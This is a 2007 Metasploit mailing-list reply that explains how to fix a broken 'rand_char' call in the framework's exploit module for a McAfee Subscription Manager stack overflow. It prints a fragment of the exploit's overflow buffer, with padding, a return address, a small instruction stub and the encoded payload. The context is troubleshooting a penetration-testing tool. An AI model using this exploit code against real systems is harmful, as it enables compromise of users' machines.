Metasploit mailing list archives

Error while Running McAfee Subscription Manager Stack Overflow


From: patrick at aushack.com (Patrick Webster)
Date: Thu, 28 Jun 2007 22:26:39 +1000

Hmm looks like the rand_char function has lost its inheritance - maybe
you're the only one to use this module in a while ;-)... One for the
developers.

In the meantime, if you want to get it working now, in (or wherever you
installed it):

C:\Program
Files\Metasploit\Framework3\home\framework\modules\exploits\windows\browser\mcafee_mcsubmgr_vsprintf.rb

... use notepad or vi to swap the following:

   rand_text(2972, payload_badchars) +
   [ ret ].pack('V') +
   "\x60" + # pusha
   "\x6a" + rand_char(payload_badchars) + # push byte 0x1
   "\x6a" + rand_char(payload_badchars) + # push byte 0x1
   "\x6a" + rand_char(payload_badchars) + # push byte 0x1
   "\x61" + # popa
   p.encoded

becomes:

   rand_text(2972, payload_badchars) +
   [ ret ].pack('V') +
   "\x60" + # pusha
   "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
   "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
   "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
   "\x61" + # popa
   p.encoded

You'll need to reload the exploit via 'rexploit' on the MSF console, or
simply close & restart Metasploit.

-Patrick
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070628/b6e3c2bf/attachment.htm>


Current thread: